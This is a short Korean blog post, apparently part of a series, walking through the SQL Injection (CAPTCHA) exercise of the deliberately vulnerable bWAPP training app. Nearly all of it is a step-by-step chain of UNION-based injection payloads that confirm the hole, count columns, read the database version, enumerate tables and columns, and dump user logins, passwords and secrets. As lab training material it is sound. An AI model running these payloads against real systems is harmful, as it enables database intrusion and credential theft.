SQL Injection ( CAPTCHA)
-Ptod7 을 입력하니
해당 창이 나오게 된다.
[ 공격 가능 확인 ]
입력 값 : ' or 1=1#
[ 컬럼 수 확인 ]
입력 값 : ' union select all 1,2,3,4,5,6,7#
[ 버전 확인 ]
입력 값 : ' union select all 1,@@version,database(),4,5,6,7#
[ 테이블 명 확인하기 ]
입력 값 : ' UNION SELECT ALL 1, table_name,3,4,5,6,7 from information_schema.tables#
[ user 테이블 컬럼 명 추출 ]
입력 값 : ' UNION SELECT ALL 1,column_name,3,4,5,6,7 from information_schema.columns where table_name='users'#
[ user 테이블의 컬럼 내용 확인 ]
입력 값 : 0' union select all 1, concat(id,login),password,email,secret,6,7 from users#
'Web hacking' 카테고리의 다른 글
| bWAPP 18.SQL Injection (Login Form/Hero) (0) | 2022.02.11 |
|---|---|
| bWAPP 16. SQL Injection (AJAX JSON jQuery) (0) | 2022.02.10 |
| bWAPP 15. SQL Injection (POST Select) (0) | 2022.02.07 |
| bWAPP 14. SQL Injection (POST Search) (0) | 2022.02.06 |
| bWAPP 13. SQL Injection (GET/Select) (0) | 2022.02.06 |